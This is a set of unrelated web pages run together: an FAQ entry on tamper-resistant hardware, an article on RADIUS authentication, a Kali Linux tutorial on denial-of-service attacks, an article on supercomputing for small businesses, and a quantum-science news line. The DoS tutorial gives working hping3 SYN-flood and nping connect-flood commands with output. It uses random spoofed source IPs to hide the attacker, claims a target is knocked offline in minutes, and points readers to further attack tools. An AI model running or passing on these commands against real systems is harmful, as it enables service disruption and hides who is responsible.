7.21 What is tamper-resistant hardware?
One part of designing a secure computer system is ensuring that various cryptographic keys can be accessed only by their intended user(s) and only for their intended purposes. Keys stored inside a computer can be vulnerable to use, abuse, and/or modification by an unauthorized attacker.
For a variety of situations, an appropriate way to protect keys is to store them in a tamper-resistant hardware device. These devices can be used for applications ranging from secure e-mail to electronic cash and credit cards. They offer physical protection to the keys residing inside them, thereby providing some assurance that these keys have not been maliciously read or modified. Typically, gaining access to the contents of a tamper-resistant device requires knowledge of a PIN or password; exactly what type of access can be gained with this knowledge is device-dependent.
Some tamper-resistant devices do not permit certain keys to be exported outside the hardware. This can provide a very strong guarantee that these keys cannot be abused: the only way to use these keys is to physically possess the particular device. Of course, these devices must actually be able to perform cryptographic functions with their protected keys, since these keys would otherwise be useless.
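The design principle can be sketched in a few lines of Python (a toy model for illustration only, not real secure hardware): the key is generated inside the "device," and the object exposes operations that use the key but no way to read it out.

```python
import hashlib
import hmac
import os

class TamperResistantToken:
    """Toy model of a tamper-resistant device: the key is generated
    inside and can never be exported -- callers may only ask the
    device to perform operations with it (here, HMAC signing)."""

    def __init__(self, pin: str):
        self._pin = pin
        self._key = os.urandom(32)  # the key lives only inside the device

    def sign(self, pin: str, message: bytes) -> bytes:
        # Access to the protected operation requires knowledge of the PIN.
        if pin != self._pin:
            raise PermissionError("wrong PIN")
        return hmac.new(self._key, message, hashlib.sha256).digest()

    # Deliberately no export_key() method: physical possession of the
    # device (here, a reference to the object) is the only way to use
    # the key.

token = TamperResistantToken(pin="1234")
mac = token.sign("1234", b"payment: 10 GBP")
assert len(mac) == 32
```

The hedge is deliberate: real devices enforce this boundary with physical countermeasures, not language-level privacy, but the interface shape is the same.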
Tamper-resistant devices come in a variety of forms and capabilities. One common type of device is a "smart card," which is approximately the size and shape of a credit card. To use a smart card, one inserts it into a smart card reader attached to a computer. Smart cards are frequently used to hold a user's private keys for financial applications; Mondex (see Question 4.2.4) is a system that makes use of tamper-resistant hardware in this fashion.
- 7.1 What is probabilistic encryption?
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:ac682401-4580-4fd0-873c-27eab32d2871> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-tamper-resistant-hardware.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00083-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920979 | 651 | 3.234375 | 3 |
RADIUS: Secure Authentication Services at Your Service
Isn’t it wonderful that we can connect to ISPs or office networks from anywhere, using any access technology? Have you ever wondered how ISPs and office networks know whether or not a user has a legitimate account? And how does a provider keep track of a user's access time anyway? The answer is very likely RADIUS, the most widely deployed example of an Authentication, Authorization, and Accounting (AAA) system.
RADIUS is a set of AAA standards that has been implemented by many vendors. It has been around for ages, quietly providing services that keep networks secure from unauthorized use. Let's delve in and learn more about this useful capability and how it can benefit you and your company's network.
Thirty years ago, ARPANET, the predecessor to the Internet, was built to permit dumb terminals to access remote computing resources. In the days before PCs and LANs, the hardwired connection between the terminal and computer was managed by a Terminal Interface Processor, or TIP. But even then, managers, developers, and users wanted to be able to work from home or on the road (dial-up via an acoustically-coupled modem). Bandwidth was scarce and expensive, and people wanted to protect the network, and the mainframes and minicomputers on it, from unauthorized access and possible disruption.
It quickly became apparent that the use of unlisted dial-in numbers was not a secure answer. Was there something that could be done to further protect the network from unauthorized access? TACACS, the original AAA system, was developed for the ARPANET to solve that problem. Later, commercial companies adopted and extended the technology in open and proprietary ways. With experience and the expanding use of data networks, the limitations of the original TACACS architecture became apparent.
RADIUS was originally developed by Steve Willens of Livingston Enterprises (a company later acquired by Lucent Technologies), and is now an IETF standard. The most recent version is RFC 2865 (June 2000), which covers both authentication and authorization. A companion IETF document, RFC 2866, describes how to extend RADIUS to implement accounting services.
What Is It Used For?
The need for AAA systems has grown tremendously over the years. Corporations (and carriers) still support dial-up lines of course, but now remote users also access networks via VPNs and broadband, while employees and guests connect to internal wireless networks simply by powering up their laptops and PCs. Today's AAA systems must be highly robust, scalable, secure, and easily manageable to meet the needs of a modern IT environment.
Basic RADIUS implementations provide access control by authenticating end users and authorizing their requests, while extended implementations include user accounting. Depending on the RADIUS product, you can:
- Centrally administer access to your network resources, perhaps with fine control over access based on time of day or by regulating the number of simultaneous log-ins by a single user
- Utilize the functions and information from your other access control systems, such as NetWare NDS and Windows Active Directory
- Allow your dial-in or VPN service vendors to query your access control database, so any changes you make are automatically available to them
- Create central summary or real-time reports that can audit usage for tracking and billing
If you have not already implemented RADIUS in your network, new technologies like wireless Ethernet should prompt you to consider it for the future.
How RADIUS Works
Fundamentally, “RADIUS is a highly extensible UDP client/server application protocol. A full server implementation of RADIUS consists of two servers: the RADIUS server itself (for Authentication and Authorization) and the RADIUS accounting server that binds to UDP ports 1812 and 1813, respectively,” says Bruce Morrison of Pegasus Networks. There are actually three types of applications that participate in RADIUS: the end user, the RADIUS client, and the RADIUS server.
- The end-user application, such as a dial-up utility, is in the end user’s PC or laptop. It talks with the RADIUS client as part of establishing a connection.
- Typically, the RADIUS client software is installed in a device at the network edge, where external traffic first enters a company’s or ISP’s infrastructure. For example, it could be located in a remote access server or firewall. The RADIUS client communicates with the end user and with the RADIUS server.
- The RADIUS server can be anywhere. The only requirement is for reliable and sufficient network connectivity between it and its clients. The RADIUS server checks the configuration database and processes the request using one or more authentication mechanisms. The database contains client service configuration data as well as specific rules for granting access. The database can be implemented separately from the server.
Because each of the three software packages is typically developed and marketed by different vendors, adherence to standards is very important.
Here are the step-by-step details of what happens when an end user accesses a network using RADIUS authentication:
- The RADIUS client receives the account username and password from the end user.
- The client sends an Access-Request to the RADIUS server with information such as the end user’s username, password, and the port-id on which the end user’s traffic is arriving over the network. The client is configured to wait for a response for a specified time. It may try again by retransmitting the request to the same server or to a different one.
- When a server receives the Access-Request, it first validates the sending client. It then authenticates the end user data by consulting the end user database entry to verify the password and any additional requirements, such as which clients or client ports the end user is permitted to use.
- If a server does not have direct access to the required database entry, and if it has been configured appropriately, the RADIUS server can act as a proxy and query another RADIUS server to get the information it needs. This facilitates implementation of capabilities such as roaming, in which one administrative entity “owns” the user and another administrative entity owns the network where access is managed.
- Finally, if and when the server is satisfied that the end user is authenticated and authorized to access the network, the RADIUS server sends a list of service configuration values back to the client. For example, a SLIP or PPP connection might be specified with values for the IP address and subnet mask. The client implements these values and the end user is given access to the network.
Additional steps might be needed if accounting options are enabled. The client might notify the server at the start and end of a session, and proxies can be used for accounting, just as they are in establishing authentication and access authorization.
A Relationship Based on Security and Trust
Security and trust are at the heart of the RADIUS client and server interaction. Their transactions are authenticated using a shared secret. To be certain that an outsider can never spoof either party, the shared secret is never transmitted over the network. Instead, it is configured directly into the client and server. The protocol also allows RADIUS servers to issue cryptographically-based challenges (ultimately responded to by the end user) as an extra security measure.
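The mechanism that keeps the password off the wire is the User-Password hiding scheme defined in RFC 2865, section 5.2: the shared secret and a random per-request authenticator are fed through MD5 to produce a keystream, and only the XORed result is transmitted. A minimal sketch using just the Python standard library:

```python
import hashlib
import os

def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 s5.2 User-Password hiding: XOR the NUL-padded password
    with an MD5 keystream derived from the shared secret and the
    16-byte Request Authenticator. The secret itself never crosses
    the wire -- only this obfuscated value does."""
    padded = password + b"\x00" * (-len(password) % 16)
    result = b""
    prev = authenticator
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        chunk = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        result += chunk
        prev = chunk  # each ciphertext block feeds the next keystream
    return result

def unhide_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Server-side reversal: regenerate the same keystream and XOR."""
    result = b""
    prev = authenticator
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        result += bytes(c ^ k for c, k in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return result.rstrip(b"\x00")

secret = b"shared-secret"        # configured into both client and server
authenticator = os.urandom(16)   # fresh random value per Access-Request
hidden = hide_password(b"s3cret-pw", secret, authenticator)
assert unhide_password(hidden, secret, authenticator) == b"s3cret-pw"
```

Because the authenticator changes on every request, the same password produces a different hidden value each time, which frustrates simple replay and dictionary matching on captured traffic.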
What makes RADIUS so versatile is that it does not dictate the end user connection or communication with the client, so it could be dial-up, hardwired to a switch port, wireless, or some new technology that hasn’t been invented yet. The connection password can and should be protected using a mechanism appropriate to the link technology. It also does not dictate the method used by the server to authenticate a password, once it knows the end user’s username and password.
The basis of RADIUS operations is the exchange of attributes between the client and server. The use of standard attributes, such as user name, password, service, addressing, and timeout information, is determined by your requirements and configuration.
RADIUS also supports the use of vendor-specific attributes — vendor-defined extensions that are implemented in only certain products, such as one vendor’s firewalls or remote access servers. When purchasing a RADIUS server, make sure that it has support for the vendor-specific attributes that are important to your network and the equipment (associated with clients) that you have or are planning to buy.
Deployment Architecture Choices
Since RADIUS supports distributed operations, the first important decision in your RADIUS deployment design is whether to outsource the management of the servers or to keep it in-house. If you neither have nor want to acquire in-house RADIUS expertise, the cost of outsourcing may compare favorably with in-house RADIUS server acquisition and operation.
If you do decide to keep it in-house, there are some important considerations for the RADIUS implementation. The RADIUS server software runs on either a dedicated or shared server platform. Like any popular client-server protocol, RADIUS server implementations are available for a variety of operating system environments, including network appliances.
Since the goal of RADIUS is to secure and control access to your network, proper RADIUS database configuration is paramount. It all comes down to good policy design first, and then implementation in the RADIUS server. Your access policy covers the rules for granting access to the network and specifying when and how RADIUS security mechanisms are used to safeguard its operation. It may be as simple as table look-ups, or it may use more sophisticated logic to look at history, behavior, or current conditions.
The configuration also includes the distribution and storage of the shared client and server secrets, and if and when challenges are used. Good security design is based on experience and an understanding of your particular needs, as well as the specifics of your network technology. If you don’t have in-house expertise, consider some outside help.
RADIUS performance can be sensitive to client retransmission or retry strategies. There is no explicit way for a RADIUS server to tell a client it is busy. Instead, RADIUS relies on the client to be well-behaved, waiting a reasonable amount of time before retransmitting the request to the same server, or contacting a different RADIUS server.
A badly configured client can quickly overload the servers with repeated requests. When planning a RADIUS deployment, you should remember that this is a client-side issue, not a problem in the server. Your goal should be to configure clients with a reasonable retransmission/retry strategy. That will depend on what is supported.
You should also aim to have sufficient server capacity so that the lack of a response is most likely due to a server’s being off the network rather than being overloaded. In addition, clients should be configured not to send test requests to RADIUS servers just to see if they are available.
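A reasonable client-side policy can be sketched as follows. This is a hypothetical illustration, not any particular vendor's implementation: wait for a reply, double the wait on each retransmission so a busy server is not hammered, and give up after a bounded number of attempts.

```python
def send_with_retries(send, max_attempts=3, base_timeout=2.0):
    """Retry policy sketch for a RADIUS-style client. `send` is a
    callable taking a timeout in seconds and returning the reply, or
    None on timeout. Because RADIUS has no 'server busy' signal, the
    client backs off by doubling its wait between retransmissions."""
    timeout = base_timeout
    for attempt in range(max_attempts):
        reply = send(timeout)
        if reply is not None:
            return reply
        timeout *= 2  # exponential backoff before the next retry
    raise TimeoutError("no response after %d attempts" % max_attempts)

# Demonstration with a fake transport that times out twice, then answers.
attempts = []
def flaky_send(timeout):
    attempts.append(timeout)
    return "Access-Accept" if len(attempts) == 3 else None

reply = send_with_retries(flaky_send, max_attempts=4, base_timeout=1.0)
assert reply == "Access-Accept"
assert attempts == [1.0, 2.0, 4.0]  # timeout doubled on each retry
```

A real client would also consider failing over to a secondary server after some number of attempts, rather than retrying the same one indefinitely.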
Use of proxies is another consideration for RADIUS deployment design. Many small and medium-sized enterprises do not need proxies. However, using RADIUS proxies can help distribute administration in large or geographically dispersed organizations, or it can be a good means to gain quick response time for user database changes. Beware, however, that using proxies may represent a potential security concern, especially if they are not under your direct control.
RADIUS performance, availability, and scalability rely on good management of load and congestion. You need to look at total server capacity (based on hardware and software), the number and location of servers, balancing load across servers, and network connectivity/bandwidth between clients and servers. These design issues are common to many client-server architectures, not just RADIUS.
Just as TACACS was superseded by RADIUS, RADIUS itself may be replaced at some point in the future. Work on DIAMETER, a potential successor to RADIUS, has been going on for a number of years in the IETF’s AAA Working Group. DIAMETER’s improvements include a fail-over strategy, use of TCP for reliable transport (instead of UDP, as RADIUS uses), and more general support for transmission-level security (via IPSEC).
DIAMETER also adds required support for server-initiated messages (to handle unsolicited disconnects, for example) and includes optional capabilities for data object security, which is particularly important when proxies are involved. It also is more explicit about the behavior of agents, such as proxies. While many of these added capabilities are of interest to companies, they are of greater and more immediate value to ISPs.
Unfortunately, the DIAMETER protocol is not directly compatible with RADIUS. However, it has been designed to coexist with RADIUS in the same network, cooperating via a gateway or a server that implements both.
RADIUS can be very useful for ensuring that remote users are who they say they are, keeping track of their network usage, and securing your network infrastructure from intrusion. If you are not already using RADIUS, what are you waiting for? If you do not have the expertise in-house to deploy it, consider using a managed service or an appliance.
Is it time to start considering DIAMETER products for your future deployments? Not just yet — while it is something to keep on your radar screen, DIAMETER is not far enough along in terms of standard vendor support or market acceptance to merit consideration for near-term implementation.
IETF specification for the RADIUS protocol: RFC 2865
IETF specification for RADIUS protocol accounting support: RFC 2866
IETF extension to RFC 2866 to include tunnel protocol support: RFC 2867
IETF extension to RFC 2865 to include tunnel protocol support: RFC 2868
IETF additional attributes that may be used with RFCs 2865 and 2866: RFC 2869
IETF specification for operation of RADIUS over IPv6: RFC 3162
IETF draft of DIAMETER base protocol (December 2002): draft-ietf-aaa-diameter-17.txt
Beth Cohen is president of Luth Computer Specialists, Inc., a consulting practice specializing in IT infrastructure for smaller companies. She has been in the trenches supporting company IT infrastructure for over 20 years in a number of different fields, including architecture, construction, engineering, software, telecommunications, and research. She is currently consulting, teaching college IT courses, and writing a book about IT for the small enterprise.
Debbie Deutsch is a principal of Beech Tree Associates, a data networking and information assurance consultancy. She is a data networking industry veteran with 25 years experience as a technologist, product manager, and consultant, including contributing to the development of the X.500 series of standards and managing certificate-signing and certificate management system products. Her expertise spans wired and wireless technologies for Enterprise, Carrier, and DoD markets. | <urn:uuid:5580fe0d-2133-4a28-ba47-462259d7d175> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/2241831/RADIUS-Secure-Authentication-Services-at-Your-Service.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00385-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927525 | 3,142 | 2.765625 | 3 |
In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux.
As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.
Denial-of-service threats are also common in business, and are sometimes responsible for website attacks.
This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games, such as popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of ‘Internet Street Protests’. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.
One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.
hping3 works well if you have other DoS tools such as GoldenEye running (using multiple tools that attack the same site/server/service increases the chances of success). Some agencies and corporations run DoS attack maps that show worldwide DDoS attacks almost in real time.
Our take on Denial-of-service Attack – DoS using hping3
Let’s face it, you installed Kali Linux to learn how to DoS, how to crack into your neighbor's wireless router, how to hack into a remote Windows machine (be that a Windows 2008 R2 server or Windows 7), or how to hack a website using SQL Injection. There are lots of guides that explain it all. In this guide, I am about to demonstrate how to DoS using hping3 with a random source IP on Kali Linux. That means:
- You are executing a Denial of Service attack or DoS using hping3
- You are hiding your a$$ (I meant your source IP address).
- Your destination machine will see source from random source IP addresses than yours (IP masquerading)
- Your destination machine will get overwhelmed within 5 minutes and stop responding.
Sounds good? I bet it does. But before we go and start using hping3, let’s just go over the basics..
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time.
Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration.
hping3 should be used to…
- Traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities.
- Perform the idle scan (now implemented in nmap with an easy user interface).
- Test firewalling rules.
- Test IDSes.
- Exploit known vulnerabilities of TCP/IP stacks.
- Networking research.
- Learn TCP/IP (hping was used in networking courses AFAIK).
- Write real applications related to TCP/IP testing and security.
- Automated firewalling tests.
- Proof of concept exploits.
- Networking and security research when there is the need to emulate complex TCP/IP behaviour.
- Prototype IDS systems.
- Simple to use networking utilities with Tk interface.
hping3 is pre-installed on Kali Linux like many other tools. It is quite useful and I will demonstrate it’s usage soon.
DoS using hping3 with random source IP
That’s enough background, I am moving to the attack. You only need to run a single line command as shown below:
root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com
HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- www.hping3testsite.com hping statistic ---
1189112 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#
Let me explain the syntax’s used in this command:
hping3= Name of the application binary.
-c 10000= Number of packets to send.
-d 120= Size of each packet sent to the target machine.
-S= I am sending SYN packets only.
-w 64= TCP window size.
-p 21= Destination port (21 being FTP port). You can use any port here.
--flood= Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
--rand-source= Use random source IP addresses. You can also use -a or --spoof to set a specific spoofed source address. See the MAN page below.
www.hping3testsite.com= Destination or target machine's IP address. You can also use a website name here. In my case it resolves to 127.0.0.1 (as entered in my local hosts file).
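For the curious, the segment that -S, -w, and -p describe is an ordinary 20-byte TCP header. A rough Python sketch using only the standard-library struct module shows where those values land (this builds the header for illustration and sends nothing; the checksum is left at zero, which hping3 or the kernel computes for real traffic):

```python
import random
import struct

def build_syn_header(src_port: int, dst_port: int, window: int) -> bytes:
    """Build a minimal 20-byte TCP header with only the SYN flag set,
    the same kind of segment `hping3 -S` emits. Fields are packed in
    network (big-endian) byte order."""
    seq = random.getrandbits(32)      # random initial sequence number
    ack = 0                           # no ACK in a bare SYN
    offset_flags = (5 << 12) | 0x02   # data offset = 5 words, SYN bit set
    return struct.pack("!HHIIHHHH",
                       src_port, dst_port, seq, ack,
                       offset_flags, window,
                       0,   # checksum placeholder
                       0)   # urgent pointer

# Mirrors -p 21 (FTP port) and -w 64 (TCP window) from the command above.
hdr = build_syn_header(src_port=40000, dst_port=21, window=64)
assert len(hdr) == 20
assert hdr[13] == 0x02  # the flags byte carries only SYN
```

A SYN flood works precisely because each such segment is cheap for the sender but forces the receiver to allocate half-open connection state.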
So how do you know it's working? In hping3 flood mode, we don't check the replies received (actually, you can't, because this command uses the --rand-source flag, which means the source IP address is no longer yours).
It took me just 5 minutes to make this machine completely unresponsive (and that's the definition of DoS: Denial of Service).
In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really really slow.
Sample command to DoS using hping3 and nping
I found this article which I found interesting and useful. I’ve only modified them to work and demonstrate with Kali Linux (as their formatting and syntaxes were broken – I assume on purpose :) ). These are not written by me. Credit goes to Insecurety Research
Simple SYN flood – DoS using HPING3
root@kali:~# hping3 -S --flood -V www.hping3testsite.com
using lo, addr: 127.0.0.1, MTU: 65536
HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- www.hping3testsite.com hping statistic ---
746021 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#
Simple SYN flood with spoofed IP – DoS using HPING3
root@kali:~# hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com
using lo, addr: 127.0.0.1, MTU: 65536
HPING www.hping3testsite.com (lo 127.0.0.1): SPU set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- www.hping3testsite.com hping statistic ---
554220 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#
TCP connect flood – DoS using NPING
root@kali:~# nping --tcp-connect --rate=90000 -c 900000 -q www.hping3testsite.com
Starting Nping 0.6.46 ( http://nmap.org/nping ) at 2014-08-21 16:20 EST
^C
Max rtt: 7.220ms | Min rtt: 0.004ms | Avg rtt: 1.684ms
TCP connection attempts: 21880 | Successful connections: 5537 | Failed: 16343 (74.69%)
Nping done: 1 IP address pinged in 3.09 seconds
root@kali:~#
Source: Insecurety Research
Any modern firewall will block such floods, and most Linux kernels come with built-in SYN flood protection these days. This guide is meant for research and learning purposes. For those who are having trouble with TCP SYN or TCP Connect floods, try learning IPTables and figure out how you can block a DoS from hping3, nping, or any other tool. You can also DoS using GoldenEye, a layer 7 DoS attack tool that simulates similar attacks, or use a PHP exploit to attack WordPress websites.
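On the detection side, here is a toy Python sketch (illustration only, not a real mitigation) of the kind of per-source rate signal that IPTables modules such as hashlimit or recent act on: flag any source that sends more than a threshold number of SYNs within a sliding time window.

```python
from collections import Counter, deque

class SynRateMonitor:
    """Toy SYN-flood detector: flag source IPs that send more than
    `limit` SYNs within `window` seconds. Real firewalls implement
    this in-kernel; this only illustrates the idea."""

    def __init__(self, limit=100, window=1.0):
        self.limit = limit
        self.window = window
        self.events = deque()   # (timestamp, src_ip), oldest first
        self.counts = Counter()

    def observe(self, src_ip, now):
        """Record one SYN; return True if src_ip exceeds the rate limit."""
        self.events.append((now, src_ip))
        self.counts[src_ip] += 1
        # Expire events that have slid out of the window.
        while self.events and now - self.events[0][0] > self.window:
            _, old_ip = self.events.popleft()
            self.counts[old_ip] -= 1
        return self.counts[src_ip] > self.limit

mon = SynRateMonitor(limit=5, window=1.0)
flags = [mon.observe("10.0.0.1", 0.0) for _ in range(6)]
assert flags == [False] * 5 + [True]  # flagged on the 6th SYN in the window
```

Note that --rand-source defeats exactly this kind of per-source accounting, which is why SYN-flood defenses also rely on techniques like SYN cookies rather than source tracking alone.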
p.s. I’ve included hping3 manpage in the next page in case you want to look that one up.
Please share and RT. | <urn:uuid:deca3cce-7745-4d3d-a9a3-6cfe4ac4820c> | CC-MAIN-2017-04 | https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00111-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.878402 | 2,317 | 2.96875 | 3 |
Many Small to Medium Enterprises (SMEs) across the UK and beyond are unaware that supercomputing can help them become more energy efficient.
With major energy suppliers recently announcing yet more price hikes, companies across all industries are feeling the pinch.
Three of the ‘big six’ British energy firms have increased their prices between eight and ten per cent on last year’s costs, and this rise could have a profound effect on the performance of SMEs across the country and beyond.
In addition, in our digital age, it is only a natural progression for businesses to increasingly boost their performance by using advanced software for data-intensive tasks such as advanced modeling and simulation, analysis of Big Data and the rendering of high-definition 3D graphics.
However, with the additional computational power, time and energy required to complete these demanding tasks, many businesses require further support to meet their customers‘ needs, and to help reduce their carbon footprint.
Many SMEs are unaware that this support could arrive in the form of supercomputing, also known as high performance computing. Often the belief is that access to supercomputing technology is limited to only the largest companies with the biggest spending power.
Although traditionally the preserve of blue chip companies and academia, SMEs can now benefit from access to supercomputing technology, training and support. The technology can significantly boost their output, while increasing their in-house energy efficiency.
So how can supercomputing help businesses achieve this?
Significant time savings
With the power of supercomputing, businesses can vastly reduce the time they spend on demanding data-intensive tasks, significantly reducing their power consumption.
One SME that has benefited from supercomputing support is Wales-based ThinkPlay.TV, an animation company founded in 2006. To date, its virtual animation work and media sets have featured on the likes of Playstation, Wii and Xbox games consoles and national UK television channels.
Typically, before the company used supercomputing, scenery would take eight hours for them to render in-house, giving them a maximum of two weeks to meet client deadlines. Furthermore, with only two desktops carrying out rendering for large periods of time, the co-founders were both unable to work on anything else.
Now, with the use of supercomputing technology, projects that would normally have taken days to complete, are finished in hours.
As work can be completed so much faster, it has helped the firm win bids for more projects, as well as significantly reducing the energy that it spends on in-house computing processes.
Accessing supercomputing technology remotely can save businesses energy in a number of ways.
Firstly, they do not have to travel to access a supercomputing hub. This in itself presents energy savings to businesses. In addition, with remote access technology, businesses can benefit from high performance computing on their own desktop and laptop computers, without the need to continually update in-house technology.
As supercomputing dramatically increases the speed of computing processes, it frees up other on-site IT resources. Using supercomputing therefore boosts companies' overall IT capacity, because all data- and power-intensive processing is taken off site. Doing so also helps to reduce businesses' overall on-site energy consumption.
Remote access to high performance computing can also be provided ‘on demand’, so companies’ use is efficient and timely, and therefore energy and resources are not wasted on ‘idling time’ from machines.
A company directly benefiting from this remote access to supercomputing technology is Calon Cardio-Technology Ltd. The company is designing and developing the next generation of affordable, implantable micro blood pumps for the treatment of chronic heart failure.
Calon Cardio uses supercomputing to simulate the flow of blood inside the pump. Prior to using supercomputing, running just one case could take up to a week; now that process can be shrunk to less than a day, or even a few hours.
Green data centre management
When considering a potential supercomputing provider, businesses should ensure that the supplier has invested in dedicated Data Centre Infrastructure Management (DCIM) software. This allows providers to balance computing capacity, or power drawn, against the current IT load. When the load is low, providers can switch hardware into ‘low activity’ or ‘standby’ modes to save energy and its associated costs.
Companies should also be sure to confirm whether a provider’s servers are designed to automatically go into ‘idle’ or ‘deep sleep’ modes during longer periods of inactivity.
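To make the idea concrete, here is a minimal sketch of the kind of load-based mode switching such software performs. The thresholds, mode names and sizing rule below are invented for illustration and do not describe any particular DCIM product:

```python
# Illustrative sketch of DCIM-style power management: when measured IT load
# drops below a threshold, surplus servers are moved to a low-power mode.
# Threshold values, mode names and the sizing rule are hypothetical.

LOW_ACTIVITY_THRESHOLD = 0.30   # below 30% utilisation, start parking servers
DEEP_SLEEP_THRESHOLD = 0.10     # below 10%, park all but one server

def plan_server_modes(utilisation, server_count):
    """Return a list of per-server modes for a given overall utilisation."""
    if utilisation < DEEP_SLEEP_THRESHOLD:
        active = 1
    elif utilisation < LOW_ACTIVITY_THRESHOLD:
        # keep just enough servers active to carry the load, plus headroom
        active = max(1, round(server_count * utilisation * 2))
    else:
        active = server_count
    return ["active"] * active + ["standby"] * (server_count - active)

print(plan_server_modes(0.05, 8))  # low load: most servers parked
print(plan_server_modes(0.80, 8))  # high load: every server stays active
```

In a real data centre the decision would also weigh wake-up latency and service-level commitments; the point is simply that capacity tracks load instead of running flat out.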
Confirming that suppliers have adopted these critical energy-saving measures helps guarantee that savings are passed on to businesses, and also that their carbon footprints remain as small as possible.
It’s clear that supercomputing has a valuable role to play in boosting the competitive capability and energy efficiency of SMEs in a wide range of sectors. The UK Government’s current investment is testament to its perceived value to the future of British business.
This is because supercomputing can reduce the time taken to complete data-intensive tasks, freeing up businesses’ IT systems to complete other tasks more easily.
This significant reduction in the time taken to complete tasks also results in increased energy efficiency for SMEs, allowing them to reinvest this time and money into other aspects of service delivery for their customers.
Furthermore, by using a supercomputing provider that is already committed to saving energy, companies can also feel safe in the knowledge that their own commitments to green business practice remain intact.
How can businesses find out more about using supercomputing technology?
Whilst purchasing a dedicated supercomputer is clearly out of most small companies’ reach, there are now a number of providers in the UK offering companies access to supercomputing technology, training and support.
Supercomputing providers across the UK are increasing the level of support available, as they recognise that many businesses have no experience of using this technology. This means businesses don’t need any previous experience of supercomputing to enjoy its benefits.
About the Author
David Craddock is chief executive officer of HPC Wales. Prior to his appointment, David Craddock was Director of Enterprise and Collaborative Projects at Aberystwyth University, responsible for leading a team of over thirty and developing the enterprise strategy for the University. Working with the senior management team, David also led a number of change management programmes including business planning for the Aberystwyth/Bangor Partnership, and the merger of the BBSRC research funded institute IGER into the University. A BA (Hons) graduate from Middlesex University, David previously worked for two Unilever companies over a 23 year period, mainly in international marketing, product development and business development roles in the detergent and speciality chemicals markets. In addition, he has been Director of two SMEs in the technical textile and electrical engineering markets.
Quantum science researchers have found a way to manipulate light that could enhance precision measurements as well as computing and communications based on the quantum physics theory that says a particle can exist in two states at once.
